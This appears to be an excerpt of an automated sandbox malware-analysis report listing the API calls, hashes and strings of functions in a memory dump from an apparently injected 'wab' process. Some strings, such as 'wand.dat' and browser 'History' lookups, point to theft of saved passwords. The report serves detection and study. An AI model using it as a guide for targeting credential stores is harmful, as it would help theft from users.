                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$??3@
                                                                                                                                                • String ID: g4@
                                                                                                                                                • API String ID: 3314356048-2133833424
                                                                                                                                                • Opcode ID: 5ca90841aa7ac27d251937f4286d5c28b71121c56bc89bd43d9446bd4e5208fe
                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                • Opcode Fuzzy Hash: 5ca90841aa7ac27d251937f4286d5c28b71121c56bc89bd43d9446bd4e5208fe
                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memicmpwcslen
                                                                                                                                                • String ID: @@@@$History
                                                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                • String ID: </%s>
                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                • API String ID: 3150196962-1506664499
                                                                                                                                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1889144086-0
                                                                                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1661045500-0
                                                                                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                Strings
                                                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3023356884-0
                                                                                                                                                • Opcode ID: eb2dac0aa54b8cba7b4ca2ec857782df2eef664205fa6e7b031a1e013bb73dd8
                                                                                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                • Opcode Fuzzy Hash: eb2dac0aa54b8cba7b4ca2ec857782df2eef664205fa6e7b031a1e013bb73dd8
                                                                                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                Uniqueness

